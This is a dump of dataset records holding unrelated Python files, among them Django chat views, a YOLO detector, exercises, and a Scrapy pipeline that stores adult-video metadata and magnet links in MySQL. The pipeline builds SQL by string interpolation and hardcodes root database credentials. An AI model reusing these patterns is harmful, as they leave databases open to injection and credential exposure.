name='vote'),\n\n\n\n\n]","sub_path":"django_for_test/polls/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"48730707","text":"from typing import (\n Dict,\n Iterable,\n Optional,\n Sequence,\n)\nfrom warnings import warn\n\nimport numpy as np\nimport xarray as xr\nfrom skimage.measure._regionprops import _RegionProperties\n\nfrom starfish.core.binary_mask import BinaryMaskCollection\nfrom starfish.core.types import Coordinates\n\n\nclass SegmentationMaskCollection(BinaryMaskCollection):\n \"\"\"Deprecated in favor of BinaryMaskCollection.\"\"\"\n def __init__(\n self,\n masks: Iterable[xr.DataArray],\n props: Optional[Iterable[Optional[_RegionProperties]]] = None,\n ):\n warn(\n f\"{self.__class__.__name__} has been deprecated in favor of \"\n f\"{BinaryMaskCollection.__name__}\",\n DeprecationWarning\n )\n super().__init__(masks, props)\n\n @classmethod\n def from_label_image(\n cls,\n label_image: np.ndarray,\n physical_ticks: Dict[Coordinates, Sequence[float]]\n ) -> \"BinaryMaskCollection\":\n warn(\n f\"{cls.__class__.__name__} has been deprecated in favor of \"\n f\"{BinaryMaskCollection.__name__}\",\n DeprecationWarning\n )\n return BinaryMaskCollection.from_label_image(label_image, physical_ticks)\n\n @classmethod\n def from_disk(cls, path: str) -> \"BinaryMaskCollection\":\n warn(\n f\"{cls.__class__.__name__} has been deprecated in favor of \"\n f\"{BinaryMaskCollection.__name__}\",\n DeprecationWarning\n )\n return BinaryMaskCollection.from_disk(path)\n","sub_path":"starfish/core/segmentation_mask/segmentation_mask.py","file_name":"segmentation_mask.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"26223054","text":"import os\nimport unittest\nfrom io import IOBase\n\nfrom sym_api_client_python.clients.message_client import open_file\n\n\ndef get_path_to_file():\n path_to_resources = os.path.join(os.path.dirname(__file__), '../resources/bot-config.json')\n return os.path.normpath(path_to_resources)\n\n\nclass TestMessageClient(unittest.TestCase):\n def test_open_file_with_filename(self):\n path = get_path_to_file()\n with open_file(path) as file:\n self.assertIsInstance(file, IOBase)\n self.assertTrue(file.readable())\n self.assertTrue(file.closed)\n\n def test_open_file_with_opened_file(self):\n path = get_path_to_file()\n with open(path) as file:\n with open_file(file) as opened_file:\n self.assertEqual(file, opened_file)\n","sub_path":"tests/clients/test_message_client.py","file_name":"test_message_client.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"30439407","text":"# Challenge 050\r\n\r\n\"\"\" Ask the user to enter a number between 10 and 20. If they enter a value under 10, display the message\r\n\"Too low\" and ask them to try again. If they enter a value above 20, display the message \"Too high\" and ask\r\nthem to try again. Keep repeating this until they enter a value that is between 10 ans 20 and then display\r\nthe message \"Thank you\". \"\"\" \r\n\r\nuser_number = int(input(\"Enter a number between 10 and 20:\\n>> \"))\r\n\r\nwhile user_number < 10 or user_number > 20:\r\n\r\n if user_number < 10:\r\n print('Too low')\r\n\r\n else:\r\n print('Too high')\r\n\r\n user_number = int(input('Try again:\\n>> '))\r\n\r\nprint('Thank you')\r\n","sub_path":"ex050.py","file_name":"ex050.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"641485559","text":"import codecs\nimport json\nimport os\nimport pymysql\nimport time\nimport logging\n\nfrom scrapy import Request\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.exceptions import DropItem\n\nclass JavbusThumbPipeline(ImagesPipeline):\n def get_media_requests(self, item, info):\n yield Request(url = item['thumb_url'], meta = {'bango' : item['bango']})\n\n def file_path(self, request, response=None, info=None):\n bango = request.meta['bango']\n image_type = request.url.split('/')[-1].split('.')[-1]\n return '%s/%s.%s' %(bango, 'thumb',image_type)\n\n def item_completed(self, result, item, info):\n path = [x['path'] for ok, x in result if ok]\n\n item['thumb_path'] = path\n return item\n\nclass JavbusCoverPipeline(ImagesPipeline):\n def get_media_requests(self, item, info):\n yield Request(url = item['cover_url'], meta = {'bango' : item['bango']})\n\n def file_path(self, request, response=None, info=None):\n bango = request.meta['bango']\n image_type = request.url.split('/')[-1].split('.')[-1]\n return '%s/%s.%s' %(bango, 'cover',image_type)\n\n def item_completed(self, result, item, info):\n path = [x['path'] for ok, x in result if ok]\n item['cover_path'] = path\n return item\n\nclass JavbusPreviewPipeline(ImagesPipeline):\n preview = 0\n def get_media_requests(self, item, info):\n for preview in item['preview_urls']:\n self.preview += 1\n yield Request(url = preview, meta = {'bango' : item['bango']})\n\n def file_path(self, request, response=None, info=None):\n bango = request.meta['bango']\n image_type = request.url.split('/')[-1].split('-')[-1]\n return '%s/%s%s.%s' %(bango, 'preview', '_', image_type)\n\n def item_completed(self, result, item, info):\n path = [x['path'] for ok, x in result if ok]\n item['preview_paths'] = path\n return item\n\nclass JavbusPipeline(object):\n def __init__(self):\n self.conn = pymysql.connect(host='127.0.0.1', user='root', passwd='1234', db='Javbus', charset='utf8')\n self.cursor = self.conn.cursor()\n sql = '''\n CREATE TABLE IF NOT EXISTS MovieData(\n bango VARCHAR(200) PRIMARY KEY,\n title TEXT,\n artwork VARCHAR(200),\n postTime DATE,\n length INTEGER,\n director VARCHAR(200),\n producer VARCHAR(200),\n series VARCHAR(200),\n types TEXT,\n link VARCHAR(200),\n thumb_path TEXT,\n cover_path TEXT,\n preview_paths TEXT\n ) DEFAULT CHARSET=utf8;'''\n self.cursor.execute(sql)\n sql = '''\n CREATE TABLE IF NOT EXISTS ActressData(\n aid VARCHAR(50) PRIMARY KEY,\n name VARCHAR(200)\n ) DEFAULT CHARSET=utf8;'''\n self.cursor.execute(sql)\n sql = '''\n CREATE TABLE IF NOT EXISTS Magnets(\n magnet VARCHAR(255) PRIMARY KEY,\n name VARCHAR(200),\n size INT\n ) DEFAULT CHARSET=utf8;'''\n self.conn.commit()\n\n def process_item(self, item, spider):\n sql = '''\n INSERT INTO MovieData VALUES (\n %s\n )'''%(self.get_item_all_info(item))\n self.cursor.execute(sql)\n self.conn.commit()\n\n def get_item_all_info(self, item):\n s = '''\n '%s',\n '%s',\n '%s',\n '%s',\n %s,\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s',\n '%s'\n '''%(\n item['bango'],\n item['title'],\n item['artwork'],\n time.strftime('%Y-%m-%d',item['postTime']),\n item['length'],\n item['director'],\n item['producer'],\n item['series'],\n json.dumps(item['types']),\n json.dumps(item['actress'],ensure_ascii=False),\n json.dumps(item['magnets'],ensure_ascii=False),\n item['link'],\n json.dumps(item['thumb_path'],ensure_ascii=False),\n json.dumps(item['cover_path'],ensure_ascii=False),\n json.dumps(item['preview_paths'],ensure_ascii=False),\n )\n return s\n\nclass JavTypePipeline(object):\n def __init__(self):\n self.conn = pymysql.connect(host='127.0.0.1', user='root', passwd='1234', db='Javbus', charset='utf8')\n self.cursor = self.conn.cursor()\n\n def open_spider(self, spider):\n self.cursor.execute('''\n CREATE TABLE IF NOT EXISTS TypeData(\n id INT PRIMARY KEY,\n type TINYTEXT,\n parent TINYTEXT\n ) DEFAULT CHARSET=utf8;''')\n\n def close_spider(self, spider):\n self.cursor.close()\n self.conn.close()\n\n def process_item(self, item, spider):\n sql = '''\n INSERT INTO TypeData(id, type, parent)\n VALUES (%s, \"%s\", \"%s\");\n ''' %(item['hash'], item['name'], item['topType'])\n try:\n self.cursor.execute(sql)\n self.conn.commit()\n except:\n print(sql)\n self.conn.rollback()\n","sub_path":"javbus/javbus/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"609543024","text":"from interface_inicial import Ui_MainWindow\nfrom PyQt5 import QtWidgets\nimport sys\n\nfrom pydm import PyDMApplication\nfrom interface_dioptas import setup_dioptas, ui_dioptas\ncontroller_dioptas = setup_dioptas()\ndioptas = ui_dioptas(ctl=controller_dioptas)\n\ndef interface_inicial_setupUI():\n app = QtWidgets.QApplication(sys.argv)\n window_II = QtWidgets.QMainWindow()\n ui_II = Ui_MainWindow()\n ui_II.setupUi(window_II) \n window_II.show()\n app.exec_()\n #sys.exit(app.exec_()) \n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n interface_inicial_setupUI()\n dioptas.run()\n \n \n''' Funcionando com o import do PyDm mas não compatível com interface_inicial\nfrom pydm import PyDMApplication\nfrom interface_dioptas import setup_dioptas, ui_dioptas\ncontroller_dioptas = setup_dioptas()\ndioptas = ui_dioptas(ctl=controller_dioptas)\n\n\nif __name__ == \"__main__\":\n dioptas.run()\n \n'''\n''' Funcionando com o import do PyDM\nfrom pydm import PyDMApplication\nfrom qtpy import QtWidgets\nfrom dioptas.controller.MainController import MainController\napp = QtWidgets.QApplication([])\ncontroller = MainController()\n\nif __name__ == \"__main__\":\n #dio = DioptasApp()\n #dio.run()\n #app = QtWidgets.QApplication([])\n #app = PyDMApplication()\n #controller = MainController()\n controller.show_window()\n app.exec_()\n del app\n \n''' ","sub_path":"interface_pyfai/main_test.py","file_name":"main_test.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"55408626","text":"import sys, math\n\nq = [ '\\0\\0\\0\\0' ] * 930\n\ndef rgbw(rgb):\n\trgb = [ ord(x)**(2.2) for x in rgb ]\n\tm = min(rgb)\n\treturn ''.join( chr( int ((x-m)**(1/2.2)) ) for x in rgb )+chr(int(m**(1/2.2)))\n\n\nwhile True:\n\ts = sys.stdin.read(900*3)\n\tif len(s) != 900*3:\n\t\tbreak\n\tfor i in xrange(900):\n\t\tsi = i*3\n\t\tdi = i+(i>=450)*30\n\t\t#q[di] = s[si:si+3]+'\\x00'\n\t\tq[di] = rgbw(s[si:si+3])\n\n\n\tsys.stdout.write(''.join(q).replace('\\x01', '\\x02')+'\\x01')\n\t\n","sub_path":"scripts/teensyoutw.py","file_name":"teensyoutw.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"454071092","text":"import datetime\n\n\nx = datetime.datetime(2019, 2, 15, 12, 45, 35)\n\ni = 0\n\nwhile i <30 :\n x = x+datetime.timedelta(days=1)+datetime.timedelta(hours=1)\n print(x.strftime(\"%Y-%m-%d %H:%M:%S\"))\n i=i+1","sub_path":"textSolve/日期测试.py","file_name":"日期测试.py","file_ext":"py","file_size_in_byte":204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"68347057","text":"def inverse(x):\n x=str(x)\n x=x[::-1]\n x=int(x)\n return x\nprint(\"Calculating whether each value is one of: palidrome, non-lychrel or lychre candidate\")\n\nnumbers=[]\nlychrel=[]\n\nx=int(input(\"Give the lower bound of numbers to consider: \"))\nx1=int(input(\"Give the upper bound of numbers to consider: \"))\n\nprint (\"The range of numbers analyzed goes from %s to %s\" %(x,x1))\nfor i in range(x1-x+1):\n numbers.append(x)\n x=x+1\na=0\nb=0\nab=0\nfor i in numbers:\n y=inverse(i)\n if i==y:\n a=a+1\n else:\n z=i+y\n y1=inverse(z)\n for i1 in range(30):\n if z==y1:\n ab=ab+1\n break\n else:\n z=z+y1\n y1=inverse(z)\n if i1==29:\n b=b+1\n lychrel.append(i)\nprint(\"the number of natural palindromes is: %s\"%(a))\nprint(\"the number of non-lychrel numbers is: %s\"%(ab))\nprint(\"the number of lychrel number candidates is: %s\"%(b))\nif b!= 0:\n print (\"found lychrel numbers: \")\n print (lychrel)\n","sub_path":"wsq11.py","file_name":"wsq11.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"527134791","text":"# qqwweee/keras-yolo3 is licensed under the MIT License\n# https://github.com/qqwweee/keras-yolo3/blob/master/LICENSE\n\nfrom timeit import default_timer as timer\nimport os\nimport os.path\n\nimport colorsys\nimport numpy as np\nfrom keras import backend as K\nfrom keras.models import load_model\nfrom keras.layers import Input\n\nfrom linc_cv.settings import YOLO_ANCHORS_PATH, YOLO_ANCHORS_CLASSES\nfrom .yolo3.model import yolo_eval, yolo_body, tiny_yolo_body\nfrom .yolo3.utils import letterbox_image\n\n\nclass YOLO(object):\n def __init__(self, model_path):\n # model path or trained weights path\n self.model_path = model_path\n self.anchors_path = YOLO_ANCHORS_PATH\n self.classes_path = YOLO_ANCHORS_CLASSES\n self.score = 0.3\n self.iou = 0.45\n self.class_names = self._get_class()\n self.anchors = self._get_anchors()\n self.sess = K.get_session()\n self.model_image_size = (416, 416) # fixed size or (None, None), hw\n self.boxes, self.scores, self.classes = self.generate()\n\n def _get_class(self):\n classes_path = os.path.expanduser(self.classes_path)\n with open(classes_path) as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n def _get_anchors(self):\n anchors_path = os.path.expanduser(self.anchors_path)\n with open(anchors_path) as f:\n anchors = f.readline()\n anchors = [float(x) for x in anchors.split(',')]\n return np.array(anchors).reshape(-1, 2)\n\n def generate(self):\n model_path = os.path.expanduser(self.model_path)\n assert model_path.endswith(\n '.h5'), 'Keras model or weights must be a .h5 file.'\n\n # Load model, or construct model and load weights.\n num_anchors = len(self.anchors)\n num_classes = len(self.class_names)\n is_tiny_version = num_anchors == 6 # default setting\n try:\n self.yolo_model = load_model(model_path, compile=False)\n except:\n if is_tiny_version:\n self.yolo_model = tiny_yolo_body(Input(shape=(None, None, 3)), num_anchors // 2, num_classes)\n else:\n self.yolo_model = yolo_body(Input(shape=(None, None, 3)), num_anchors // 3, num_classes)\n # make sure model, anchors and classes match\n self.yolo_model.load_weights(self.model_path)\n else:\n assert self.yolo_model.layers[-1].output_shape[-1] == num_anchors / len(self.yolo_model.output) * (\n num_classes + 5), \\\n 'Mismatch between model and given anchor and class sizes'\n\n print('{} model, anchors, and classes loaded.'.format(model_path))\n\n # Generate colors for drawing bounding boxes.\n hsv_tuples = [(x / len(self.class_names), 1., 1.)\n for x in range(len(self.class_names))]\n self.colors = list(map(lambda x: colorsys.hsv_to_rgb(*x), hsv_tuples))\n self.colors = list(\n map(lambda x: (int(x[0] * 255), int(x[1] * 255), int(x[2] * 255)),\n self.colors))\n np.random.seed(10101) # Fixed seed for consistent colors across runs.\n # Shuffle colors to decorrelate adjacent classes.\n np.random.shuffle(self.colors)\n np.random.seed(None) # Reset seed to default.\n\n # Generate output tensor targets for filtered bounding boxes.\n self.input_image_shape = K.placeholder(shape=(2,))\n boxes, scores, classes = yolo_eval(self.yolo_model.output, self.anchors,\n len(self.class_names), self.input_image_shape,\n score_threshold=self.score, iou_threshold=self.iou)\n return boxes, scores, classes\n\n def detect_image(self, image):\n\n if self.model_image_size != (None, None):\n assert self.model_image_size[0] % 32 == 0, 'Multiples of 32 required'\n assert self.model_image_size[1] % 32 == 0, 'Multiples of 32 required'\n boxed_image = letterbox_image(\n image, tuple(reversed(self.model_image_size)))\n else:\n new_image_size = (image.width - (image.width % 32),\n image.height - (image.height % 32))\n boxed_image = letterbox_image(image, new_image_size)\n image_data = np.array(boxed_image, dtype='float32')\n image_data /= 255.\n image_data = np.expand_dims(image_data, 0) # Add batch dimension.\n\n out_boxes, out_scores, out_classes = self.sess.run(\n [self.boxes, self.scores, self.classes],\n feed_dict={\n self.yolo_model.input: image_data,\n self.input_image_shape: [image.size[1], image.size[0]],\n K.learning_phase(): 0\n })\n\n rois = []\n for i, c in reversed(list(enumerate(out_classes))):\n predicted_class = self.class_names[c]\n box = out_boxes[i]\n score = out_scores[i]\n top, left, bottom, right = box\n top = max(0, np.floor(top + 0.5).astype('int32'))\n left = max(0, np.floor(left + 0.5).astype('int32'))\n bottom = min(image.size[1], np.floor(bottom + 0.5).astype('int32'))\n right = min(image.size[0], np.floor(right + 0.5).astype('int32'))\n rois.append([predicted_class, float(score), int(top), int(left), int(bottom), int(right)])\n return rois\n\n def close_session(self):\n self.sess.close()\n\n\nVALID_IMAGE_EXTENSIONS = {'.jpeg', '.jpg', '.png', '.bmp'}\n\nif __name__ == '__main__':\n import os\n import os.path\n import argparse\n\n model_path = \"whisker_model.h5\"\n parser = argparse.ArgumentParser(\n description='Find whisker bounding box from lion face image')\n parser.add_argument('whisker_image_path')\n args = parser.parse_args()\n assert os.path.isfile(args.whisker_image_path), args.whisker_image_path\n yolo = YOLO(model_path=model_path)\n for _ in range(20):\n rois = yolo.detect_image(args.whisker_image_path)\n print('rois', rois)\n yolo.close_session()\n\n","sub_path":"linc_cv/modality_whisker/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"440268017","text":"from django.shortcuts import render, HttpResponse\nfrom user_auth.decorators import login_required,management_required\nfrom user_auth.models import User,Profile\nfrom clans.models import community\nfrom .models import Message, GroupMessage\n\nimport base64\nimport datetime,json\n\n# Create your views here.\n\n# import the MongoClient class from the library\nfrom pymongo import MongoClient\nmongo_client = MongoClient()\ndb = mongo_client.EAD_OOAL\n\n\n@login_required\ndef chatHome(request):\n username = request.session[\"username\"]\n user = User.objects(email=username)[0]\n profile = Profile.objects(user_id=user[\"id\"])[0]\n frnds = profile.friends\n clans = profile.clans_registered\n friends_list = []\n groups_list = []\n for friend in frnds:\n temp = dict()\n frnd = Profile.objects(user_id=friend)[0]\n frnd_u = User.objects(id=friend)[0]\n temp['name'] = frnd[\"name\"]\n temp['id'] = frnd_u[\"id\"]\n photo= frnd[\"photo\"].read()\n my_string = base64.b64encode(photo)\n temp[\"photo\"] = my_string.decode('utf-8')\n friends_list.append(temp)\n print(len(friends_list))\n for clan in clans:\n temp = dict()\n group = community.objects(id=clan)[0]\n temp[\"id\"] = group[\"id\"]\n temp['name'] = group[\"name\"]\n photo= group[\"photo\"].read()\n my_string = base64.b64encode(photo)\n temp[\"photo\"] = my_string.decode('utf-8')\n groups_list.append(temp)\n print(len(groups_list))\n return render(request,'chat/home.html',{'friends_list': friends_list, 'groups_list': groups_list})\n\n@login_required\ndef getMsgs(request):\n if request.method==\"GET\":\n chat_msgs = []\n friend_id = request.GET['f_id']\n cu_user = request.session[\"username\"]\n c_user = User.objects(email=cu_user)[0]\n c_u_prof = Profile.objects(user_id=c_user['id'])[0]\n msgs = c_u_prof['messages']\n\n if(msgs):\n for msg in msgs:\n c_msg = Message.objects(id=msg)[0]\n if c_msg['sender'] == friend_id:\n chat_msgs.append(c_msg)\n\n\n return render(request,'chat/priv_msg.html')\n\n@login_required\ndef getGroupMsgs(request):\n if request.method==\"GET\":\n group_msgs = []\n group_id = request.GET['clan_id']\n print(\"Group Id : \",group_id)\n cu_user = request.session[\"username\"]\n c_user = User.objects(email=cu_user)[0]\n uid = c_user['id']\n clan = community.objects(id=group_id)[0]\n print(\"got clan object\")\n temp = dict()\n temp['id'] = clan[\"id\"]\n temp['name'] = clan[\"name\"]\n photo= clan[\"photo\"].read()\n my_string = base64.b64encode(photo)\n temp[\"photo\"] = my_string.decode('utf-8')\n group_details = temp\n\n msgs = clan['messages']\n for msg in msgs:\n print(msg)\n g_msg = GroupMessage.objects(id=msg)[0]\n group_msgs.append(g_msg)\n return render(request,'chat/msg.html', {'group_msgs': group_msgs, \"group_details\": group_details, \"uid\":uid})\n\n\n@login_required\ndef sendGrpMsg(request):\n if request.method =='POST':\n text = request.POST['msg']\n c_id = request.POST['clan_id']\n cu_user = request.session[\"username\"]\n c_user = User.objects(email=cu_user)[0]\n c_u_prof = Profile.objects(user_id=c_user['id'])[0]\n message = GroupMessage(msg=text,sender=c_user['id'],group=c_id)\n message.save()\n print(\"message saved\")\n print(message['id'])\n community.objects(id=c_id).update_one(push__messages = message['id'])\n return HttpResponse('Success')\n else:\n return HttpResponse('Failure')\n\n\n\ndef getPrivMsgs(request):\n if request.method == 'GET':\n frnd_id = request.GET['f_id']\n\n cu_user = request.session[\"username\"]\n c_user = User.objects(email = cu_user)[0]\n cu_prof = Profile.objects.get(user_id = c_user['id'])\n frnd_prof = Profile.objects.get(user_id = frnd_id)\n my_id = c_user['id']\n frnd_name = frnd_prof['name']\n\n myphoto= cu_prof[\"photo\"].read()\n myph = base64.b64encode(myphoto)\n my_photo = myph.decode('utf-8')\n frndphoto= frnd_prof[\"photo\"].read()\n frndph = base64.b64encode(frndphoto)\n frnd_photo = frndph.decode('utf-8')\n\n\n msgs = cu_prof['messages']\n print('Profile msgs', len(msgs))\n messages = []\n\n for msg in msgs:\n print(msg)\n temp = Message.objects.get(id = msg)\n temp_r = temp['reciever']\n temp_s = temp['sender']\n ff_id = frnd_prof['user_id']\n print(temp_r == ff_id)\n print(temp_s == ff_id)\n if temp_s == ff_id or temp_r == ff_id:\n temp1 = dict()\n temp1['message'] = temp['msg']\n temp1['sender'] = temp['sender']\n temp1['reciever'] = temp['reciever']\n temp1['time'] = temp['createdAt']\n\n messages.append(temp1)\n else:\n continue\n\n print('messages',len(messages))\n print('frnd', frnd_name)\n\n return render(request, 'chat/priv_msg.html', {'messages': messages, \"friend\": frnd_name ,\"my_id\":my_id, \"my_photo\":my_photo, \"frnd_photo\": frnd_photo, \"friend_id\": frnd_id})\n else:\n return HttpResponse('Failure')\n\ndef sendPrivMsg(request):\n if request.method == 'POST':\n print(\"got request\")\n text = request.POST['msg']\n frnd_id = request.POST['f_id']\n print(text)\n print(frnd_id)\n\n cu_user = request.session[\"username\"]\n c_user = User.objects(email = cu_user)[0]\n cu_prof = Profile.objects.get(user_id = c_user['id'])\n\n msg = Message(msg=text, sender=c_user['id'], reciever=frnd_id)\n msg.save()\n print(\"message saved\")\n\n Profile.objects(user_id = c_user['id']).update_one(push__messages = msg['id'])\n Profile.objects(user_id = frnd_id).update_one(push__messages = msg['id'])\n print(\"Profiles changed\")\n return HttpResponse('Success')\n else:\n return HttpResponse('Failure')\n","sub_path":"chat/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"593234160","text":"#!/usr/bin/python\n\n# This program creates a video showing the trajectory of a customer\n#\n# Usage:\n# ./createvideo.py <path to image frames folder> <path to json file> <output video name> <frame width> <frame height> <r component for path color>\n# <g component for path color> <b component for path color> <frame rate final video> <number of image detection>\n\nimport cv2\nimport sys\nimport json\nimport glob\nimport argparse\nimport datetime \n\n# script receives the following parameters\nparser = argparse.ArgumentParser()\nparser.add_argument('frames', type=str, help='image_frames_folder/*.jpg')\nparser.add_argument('jsonfile', type=str, help='JSON file')\nparser.add_argument('video', type=str, help='output video file (.avi)')\nparser.add_argument('width', type=str, help='frame width')\nparser.add_argument('height', type=str, help='frame height')\nparser.add_argument('r', type=str, help='red component trajectory')\nparser.add_argument('g', type=str, help='green component trajectory')\nparser.add_argument('b', type=str, help='blue component trajectory')\nparser.add_argument('frame_rate', type=str, help='frame rate')\nparser.add_argument('detection', type=str, help='detection name')\nargs = parser.parse_args()\n\ndirectory = args.frames\njson_file = args.jsonfile\noutput_file = args.video\nwidth = int(args.width)\nheight = int(args.height)\nframe_rate = int(args.frame_rate)\nlistx = []\nlisty = []\nlistw = []\nlisth = []\ncolor_path = (int(args.r), int(args.g), int(args.b))\ncolor_circle = color_path\ndetection = args.detection\n\n# video header\nfourcc = cv2.VideoWriter_fourcc(*'XVID')\nvideo = cv2.VideoWriter(output_file,fourcc, frame_rate, (width,height))\n\n####\n# given a detection name this function returns the cluster name for that\n# particular detection\n####\ndef retriveClusterName(det_n):\n cl_name = \"\"\n for cluster in data:\n for detection in cluster[\"files\"]:\n d_name = detection[\"name\"]\n d_name = d_name[(len(d_name)- 23):(len(d_name) - 4)]\n if (str(d_name) == str(det_n)):\n cl_name = str(cluster[\"name\"])\n break\n return cl_name\n\n###\n# get detection location for a particular frame and cluster\n###\ndef retrieveDetection(frame_time, cluster_label):\n center = []\n for cluster in data:\n for detection in cluster[\"files\"]:\n epoch = detection[\"epoch\"]\n if (str(epoch) == str(frame_time) and str(cluster_label) == str(cluster[\"name\"] )):\n # center_x = detection[\"head\"][\"x\"] + detection[\"head\"][\"width\"] /2\n # center_y = detection[\"head\"][\"y\"] + detection[\"head\"][\"height\"] /2\n # width_head = detection[\"head\"][\"width\"]\n # height_head = detection[\"head\"][\"height\"]\n center_x = int(detection[\"location\"][\"x\"] + detection[\"location\"][\"width\"] * 0.5)\n center_y = int(detection[\"location\"][\"y\"] + (detection[\"location\"][\"height\"] * 0.4))\n width_head = int(detection[\"location\"][\"width\"] * 0.3 )\n height_head= int(detection[\"location\"][\"height\"] * 0.3)\n center.append(center_x)\n center.append(center_y)\n center.append(width_head)\n center.append(height_head)\n break\n return center\n\n###\n# main script\n###\n# get the list of image names from directory\nfiles = glob.glob(directory)\n\n# read JSON file\nwith open(json_file) as data_file: \n data = json.load(data_file)\nno_detections = 0\n\n# get name first image of cluster \nfirst_image = detection[0:13] + '000000'\ncluster_name = retriveClusterName(detection)\non_first_image = False\n\n# for each file \nfor file in files:\n ext = file[len(file)-4:len(file)] # get image extension\n end = file.find(ext) - 6 \n start = end - 13\n frame_time = file[start:end] \n \n # look for the first frame containing the first customer detection\n if (not first_image == frame_time + '000000') and (not on_first_image):\n continue\n on_first_image = True\n\n frame = cv2.imread(file)\n frame_height, frame_width = frame.shape[:2]\n center = []\n cv2.rectangle(frame, (0, 0), (frame_width, 25), (0,0,0), -1, cv2.LINE_AA, 0)\n date = datetime.datetime.fromtimestamp(int(frame_time)/1000.0)\n cv2.putText(frame,date.strftime('%H:%M:%S'), (0,17), cv2.FONT_HERSHEY_SIMPLEX, .50, color_path, 1, cv2.LINE_AA)\n # retrieve detection information from JSON file\n center = retrieveDetection(frame_time, cluster_name )\n \n # there was a detection in this frame\n if not len(center) == 0:\n listx.append(center[0]) # center x\n listy.append(center[1]) # center y\n listw.append(center[2]) # width head\n listh.append(center[3]) # height head\n no_detections = 0\n else:\n no_detections += 1\n\n # plot curve for previous detections\n for p in range(1, len(listx)):\n if(p == len(listx)-1): # print a ellipse just in the last detection\n cv2.ellipse(frame, (listx[p], listy[p]), (listw[p], listh[p]), 0, 0, 360, color_circle, 2, cv2.LINE_AA)\n # plot path\n cv2.line(frame, (listx[p-1], listy[p-1]), (listx[p],listy[p]), color_path, 3, cv2.LINE_AA) \n #end for\n \n # if the person is not detected for 30 frames then the\n # list of points is deleted\n if no_detections > 30:\n listx = []; listx =[]; listw = []; listh = []\n \n # stop video creation 50 frames after last detection \n if no_detections > 50:\n break\n\n cv2.imshow('Tempo analytics', frame)\n video.write(frame) #save frame in video\n cv2.waitKey(int(1000/frame_rate))\n \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n# end for loop\n\ncv2.destroyAllWindows()\nvideo.release()","sub_path":"createvideo.py","file_name":"createvideo.py","file_ext":"py","file_size_in_byte":5474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"118532263","text":"import unittest\nimport numpy\nimport foo\n\nclass TestFooMethods(unittest.TestCase):\n\tdef test_Create_Array(self):\n\t\t'''testing createArray methods'''\n\t\tself.array = foo.create_Array((2,2))\n\t\tself.assertEqual(type(self.array), type(numpy.ones((2,2))), 'Created array is not a numpy array')\n\n\tdef test_reshapeArray(self):\n\t\tself.array = foo.create_Array((2,2))\n\t\tself.assertEqual(foo.reshape_Array(self.array,(1,4)).shape, (1,4), 'Reshape is not working')\n\n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"219639020","text":"import os\r\nimport sys\r\nimport argparse\r\nimport pickle\r\nimport gzip\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom PIL import Image\r\nimport matplotlib\r\nmatplotlib.use('agg')\r\nsys.path.append(os.getcwd())\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom aae import AdversarialAutoEncoder as AAE\r\nfrom solder.custom_image_sampler_generate import ImageSampler\r\nfrom solder.autoencoder import AutoEncoder\r\nfrom solder.discriminator import Discriminator\r\nimport tensorflow as tf\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('ok_csv_path', type=str)\r\n parser.add_argument('ng_csv_path', type=str)\r\n parser.add_argument('ok_image_dir', type=str)\r\n parser.add_argument('ng_image_dir', type=str)\r\n parser.add_argument('--ok_test_nb_sample', '-otns', type=int, default=None)\r\n parser.add_argument('--ng_test_nb_sample', '-ntns', type=int, default=None)\r\n parser.add_argument('--batch_size', '-bs', type=int, default=234)\r\n parser.add_argument('--latent_dim', '-ld', type=int, default=16)\r\n parser.add_argument('--height', '-ht', type=int, default=64)\r\n parser.add_argument('--width', '-wd', type=int, default=64)\r\n parser.add_argument('--channel', '-ch', type=int, default=8)\r\n parser.add_argument('--model_path', '-mp', type=str, default=\"./params/epoch_200/model.ckpt\")\r\n parser.add_argument('--result_dir', '-rd', type=str, default=\"./result\")\r\n parser.add_argument('--nb_visualize_batch', '-nvb', type=int, default=1)\r\n parser.add_argument('--select_gpu', '-sg', type=str, default=\"0\")\r\n\r\n args = parser.parse_args()\r\n os.makedirs(args.result_dir, exist_ok=True)\r\n\r\n config = tf.ConfigProto(\r\n gpu_options=tf.GPUOptions(\r\n visible_device_list=args.select_gpu, # specify GPU 